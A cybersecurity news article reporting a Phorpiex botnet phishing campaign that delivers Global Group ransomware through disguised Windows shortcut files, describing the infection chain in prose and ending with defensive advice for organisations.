Cybersecurity researchers are warning of a resurgence in attacks leveraging the Phorpiex botnet, a decade-old malware-as-a-service platform. In a recent campaign, threat actors are employing sophisticated social engineering tactics, using phishing emails with the subject line “Your Document” to distribute Global Group ransomware. This ransomware, identified as a successor to the Mamona ransomware family, is delivered through weaponized Windows shortcut files designed to bypass user scrutiny.
The current campaign by the Phorpiex botnet distributes phishing emails that appear to contain a benign document within a ZIP attachment. However, upon opening the attachment, users are presented with a Windows shortcut file (.lnk) disguised as a document, often with double extensions like “Document.doc.lnk.” Due to Windows’ default setting of hiding known file extensions, many users may perceive these as legitimate document files. To further enhance the deception, these malicious shortcuts utilize authentic Windows icons, significantly lowering the suspicion threshold for potential victims.
Attackers Weaponizing Windows Shortcut Files for Global Group Ransomware
Forcepoint researchers have detailed the infection chain, highlighting its stealth and efficiency. When a user clicks the malicious shortcut, it secretly executes commands. The shortcut initiates the Windows Command Processor, which then invokes PowerShell. This script downloads a secondary payload from a remote server, which is the Global Group ransomware itself. This payload is often named to mimic legitimate Windows drivers, further blending in with system processes. The attack utilizes “Living off the Land” techniques, employing legitimate system tools to evade detection by traditional security software.
A critical and concerning feature of Global Group ransomware is its autonomous operation. Unlike many ransomware variants that rely on command-and-control servers to retrieve encryption keys, Global Group generates its encryption keys locally on the compromised machine. This capability allows it to operate effectively even in offline or air-gapped environments, making it resistant to network-based detection methods that monitor suspicious outbound traffic.
The ransomware also employs aggressive anti-forensic measures to obscure its presence. It uses a ping command as a delay mechanism before deleting its own binary from the disk, complicating post-incident investigations. Furthermore, it actively searches for and terminates processes associated with analysis tools and databases, aiming to encrypt the maximum amount of data without encountering interference.
To mitigate the risks posed by these evolving threats, organizations are advised to block executable attachments, including LNK files, at the email gateway. Prioritizing endpoint monitoring and implementing behavior-based detection is also crucial. By focusing on how the malware operates rather than solely relying on signature-based detection, security teams can identify and stop the encryption process before significant data loss occurs, especially given the ransomware’s ability to operate offline.